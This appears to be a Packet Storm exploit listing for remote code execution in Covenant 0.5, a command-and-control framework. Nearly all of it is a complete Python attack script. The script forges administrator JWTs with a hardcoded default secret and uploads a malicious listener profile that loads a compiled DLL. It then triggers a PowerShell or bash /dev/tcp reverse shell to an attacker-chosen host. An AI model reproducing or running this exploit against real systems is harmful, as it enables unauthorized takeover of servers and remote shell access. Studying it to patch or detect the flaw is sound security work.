Security
Headlines
HeadlinesLatestCVEs

Headline

Covenant 0.5 Remote Code Execution

Covenant version 0.5 suffers from a remote code execution vulnerability.

Packet Storm
#vulnerability#web#mac#windows#apple#microsoft#linux#js#git#rce#auth#docker#chrome#webkit#ssl
# Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)# Exploit Author: xThaz# Author website: https://xthaz.fr/# Date: 2022-09-11# Vendor Homepage: https://cobbr.io/Covenant.html# Software Link: https://github.com/cobbr/Covenant# Version: v0.1.3 - v0.5# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker# Vulnerability## Discoverer: coastal## Date: 2020-07-13## Discoverer website: https://blog.null.farm## References:##   - https://blog.null.farm/hunting-the-hunters##   - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb# !/usr/bin/env python3# encoding: utf-8import jwt  # pip3 install PyJWTimport jsonimport warningsimport base64import reimport randomimport argparsefrom requests.packages.urllib3.exceptions import InsecureRequestWarningfrom Crypto.Hash import HMAC, SHA256  # pip3 install pycryptodomefrom Crypto.Util.Padding import padfrom Crypto.Cipher import AESfrom requests import request  # pip3 install requestsfrom subprocess import runfrom pwn import remote, context  # pip3 install pwntoolsfrom os import remove, urandomfrom shutil import whichfrom urllib.parse import urlparsefrom pathlib import Pathfrom time import timedef check_requirements():    if which("mcs") is None:        print("Please install the mono framework in order to compile the payload.")        print("https://www.mono-project.com/download/stable/")        exit(-1)def random_hex(length):    alphabet = "0123456789abcdef"    return ''.join(random.choice(alphabet) for _ in range(length))def request_api(method, token, route, body=""):    warnings.simplefilter('ignore', InsecureRequestWarning)    return request(        method,        f"{args.target}/api/{route}",        json=body,        headers={            "Authorization": f"Bearer {token}",            "Content-Type": "application/json"        },        verify=False    )def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"):    secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'    payload_data = {        "sub": username,        "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",        "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,        "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [            "User",            "Administrator"        ],        "exp": int(time()) + 360,        "iss": "Covenant",        "aud": "Covenant"    }    token = jwt.encode(payload_data, secret_key, algorithm='HS256')    return tokendef get_id_admin(token, json_roles):    id_admin = ""    for role in json_roles:        if role["name"] == "Administrator":            id_admin = role["id"]            print(f"\t[*] Found the admin group id : {id_admin}")            break    else:        print("\t[!] Did not found admin group id, quitting !")        exit(-1)    id_admin_user = ""    json_users_roles = request_api("get", token, f"users/roles").json()    for user_role in json_users_roles:        if user_role["roleId"] == id_admin:            id_admin_user = user_role["userId"]            print(f"\t[*] Found the admin user id : {id_admin_user}")            break    else:            print("\t[!] Did not found admin id, quitting !")        exit(-1)    json_users = request_api("get", token, f"users").json()    for user in json_users:        if user["id"] == id_admin_user:            username_admin = user["userName"]            print(f"\t[*] Found the admin username : {username_admin}")            return username_admin, id_admin_user    else:            print("\t[!] Did not found admin username, quitting !")        exit(-1)def compile_payload():    if args.os == "windows":        payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'    else:        payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'    dll = """using System;using System.Reflection;namespace ExampleDLL{    public class Class1{        public Class1(){        }        public void Main(string[] args){            System.Diagnostics.Process.Start(""" + payload + """);        }    }}"""    temp_dll_path = f"/tmp/{random_hex(8)}"    Path(f"{temp_dll_path}.cs").write_bytes(dll.encode())    print(f"\t[*] Writing payload in {temp_dll_path}.cs")    compilo_path = which("mcs")    compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])    if compilation.returncode:        print("\t[!] Error when compiling DLL, quitting !")        exit(-1)    print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")    dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()    remove(temp_dll_path + ".cs")    remove(temp_dll_path + ".dll")    print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")    return dll_encodeddef generate_wrapper(dll_encoded):    wrapper = """public static class MessageTransform {    public static string Transform(byte[] bytes) {        try {            string assemblyBase64 = \"""" + dll_encoded + """\";            var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);            var assembly = System.Reflection.Assembly.Load(assemblyBytes);            foreach (var type in assembly.GetTypes()) {                object instance = System.Activator.CreateInstance(type);                object[] args = new object[] { new string[] { \"\" } };                try {                    type.GetMethod(\"Main\").Invoke(instance, args);                }                catch {}            }        }        catch {}        return System.Convert.ToBase64String(bytes);    }    public static byte[] Invert(string str) {        return System.Convert.FromBase64String(str);    }}"""    return wrapperdef upload_profile(token, wrapper):    body = {        'httpUrls': [            '/en-us/index.html',            '/en-us/docs.html',            '/en-us/test.html'        ],        'httpRequestHeaders': [            {'name': 'User-Agent',             'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '                      'Safari/537.36'},            {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}        ],        'httpResponseHeaders': [            {'name': 'Server', 'value': 'Microsoft-IIS/7.5'}        ],        'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',        'httpGetResponse': '{DATA}',        'httpPostResponse': '{DATA}',        'id': 0,        'name': random_hex(8),        'description': '',        'type': 'HTTP',        'messageTransform': wrapper    }    response = request_api("post", token, "profiles/http", body)    if not response.ok:        print("\t[!] Failed to create the listener profile, quitting !")        exit(-1)    else:        profile_id = response.json().get('id')        print(f"\t[*] Profile created with id {profile_id}")        print("\t[*] Successfully created the listener profile")        return profile_iddef generate_valid_listener_port(impersonate_token, tries=0):    if tries >= 10:        print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")        exit(-1)    port = random.randint(8000, 8250)  # TO BE EDITED WITH YOUR TARGET LISTENER PORT    listeners = request_api("get", impersonate_token, "listeners").json()    port_used = []    for listener in listeners:        port_used.append(listener["bindPort"])    if port in port_used:        print(f"\t[!] Port {port} is already taken by another listener, retrying !")        generate_valid_listener_port(impersonate_token, tries + 1)    else:        print(f"\t[*] Port {port} seems free")        return portdef get_id_listener_type(impersonate_token, listener_name):    response = request_api("get", impersonate_token, "listeners/types")    if not response.ok:        print("\t[!] Failed to get the listener type, quitting !")        exit(-1)    else:        for listener_type in response.json():            if listener_type["name"] == listener_name:                print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}')                return listener_type["id"]def generate_listener(impersonate_token, profile_id):    listener_port = generate_valid_listener_port(impersonate_token)    listener_name = random_hex(8)    data = {        'useSSL': False,        'urls': [            f"http://0.0.0.0:{listener_port}"        ],        'id': 0,        'name': listener_name,        'bindAddress': "0.0.0.0",        'bindPort': listener_port,        'connectAddresses': [            "0.0.0.0"        ],        'connectPort': listener_port,        'profileId': profile_id,        'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),        'status': 'Active'    }    response = request_api("post", impersonate_token, "listeners/http", data)    if not response.ok:        print("\t[!] Failed to create the listener, quitting !")        exit(-1)    else:        print("\t[*] Successfully created the listener")        listener_id = response.json().get("id")        return listener_id, listener_portdef create_grunt(impersonate_token, data):    stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"]    if stager_code == "":        stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"]        if stager_code == "":            print("\t[!] Failed to create the grunt payload, quitting !")            exit(-1)    print("\t[*] Successfully created the grunt payload")    return stager_codedef get_grunt_config(impersonate_token, listener_id):    data = {        'id': 0,        'listenerId': listener_id,        'implantTemplateId': 1,        'name': 'Binary',        'description': 'Uses a generated .NET Framework binary to launch a Grunt.',        'type': 'binary',        'dotNetVersion': 'Net35',        'runtimeIdentifier': 'win_x64',        'validateCert': True,        'useCertPinning': True,        'smbPipeName': 'string',        'delay': 0,        'jitterPercent': 0,        'connectAttempts': 0,        'launcherString': 'GruntHTTP.exe',        'outputKind': 'consoleApplication',        'compressStager': False    }    stager_code = create_grunt(impersonate_token, data)    aes_key = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code)    guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)    if not aes_key or not guid_prefix:        print("\t[!] Failed to retrieve the grunt configuration, quitting !")        exit(-1)    aes_key = aes_key.group(1)    guid_prefix = guid_prefix.group(1)    print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")    return aes_key, guid_prefixdef aes256_cbc_encrypt(key, message):    iv_bytes = urandom(16)    key_decoded = base64.b64decode(key)    encoded_message = pad(message.encode(), 16)    cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes)    encrypted = cipher.encrypt(encoded_message)    hmac = HMAC.new(key_decoded, digestmod=SHA256)    signature = hmac.update(encrypted).digest()    return encrypted, iv_bytes, signaturedef trigger_exploit(listener_port, aes_key, guid):    message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"    ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)    data = {        "GUID": guid,        "Type": 0,        "Meta": '',        "IV": base64.b64encode(iv).decode(),        "EncryptedMessage": base64.b64encode(ciphered).decode(),        "HMAC": base64.b64encode(signature).decode()    }    json_data = json.dumps(data).encode("utf-8")    payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73"    if send_exploit(listener_port, "Cookie", guid, payload):        print("\t[*] Exploit succeeded, check listener")    else :        print("\t[!] Exploit failed, retrying")        if send_exploit(listener_port, "Cookies", guid, payload):            print("\t[*] Exploit succeeded, check listener")        else:            print("\t[!] Exploit failed, quitting")def send_exploit(listener_port, header_cookie, guid, payload):    context.log_level = 'error'    request = f"""POST /en-us/test.html HTTP/1.1\rHost: {IP_TARGET}:{listener_port}\rUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\rContent-Type: application/x-www-form-urlencoded\rContent-Length: {len(payload)}\r\r{payload}""".encode()    sock = remote(IP_TARGET, listener_port)    sock.sendline(request)    response = sock.recv().decode()    sock.close()    if "HTTP/1.1 200 OK" in response:        return True    else:        return Falseif __name__ == "__main__":    check_requirements()    parser = argparse.ArgumentParser()    parser.add_argument("target",                        help="URL where the Covenant is hosted, example : https://127.0.0.1:7443")    parser.add_argument("os",                        help="Operating System of the target",                        choices=["windows", "linux"])    parser.add_argument("lhost",                        help="IP of the machine that will receive the reverse shell")    parser.add_argument("lport",                        help="Port of the machine that will receive the reverse shell")    args = parser.parse_args()    IP_TARGET = urlparse(args.target).hostname    print("[*] Getting the admin info")    sacrificial_token = craft_jwt("xThaz")    roles = request_api("get", sacrificial_token, "roles").json()    admin_username, admin_id = get_id_admin(sacrificial_token, roles)    impersonate_token = craft_jwt(admin_username, admin_id)    print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")    print("[*] Generating payload")    dll_encoded = compile_payload()    wrapper = generate_wrapper(dll_encoded)    print("[*] Uploading malicious listener profile")    profile_id = upload_profile(impersonate_token, wrapper)    print("[*] Generating listener")    listener_id, listener_port = generate_listener(impersonate_token, profile_id)    print("[*] Triggering the exploit")    aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)    trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution